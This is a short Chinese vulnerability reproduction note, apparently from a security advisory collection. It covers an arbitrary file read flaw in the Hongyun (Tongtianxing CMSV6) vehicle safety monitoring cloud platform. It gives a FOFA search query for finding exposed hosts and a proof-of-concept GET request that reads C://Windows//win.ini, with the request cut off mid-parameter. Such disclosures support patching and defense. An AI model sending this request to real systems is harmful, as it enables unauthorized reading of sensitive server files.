鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞复现
1.漏洞介绍
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞,攻击者可利用该漏洞读取系统敏感文件
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:body=“./open/webApi.html” || body=“/808gps/”
5.POC
GET /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffs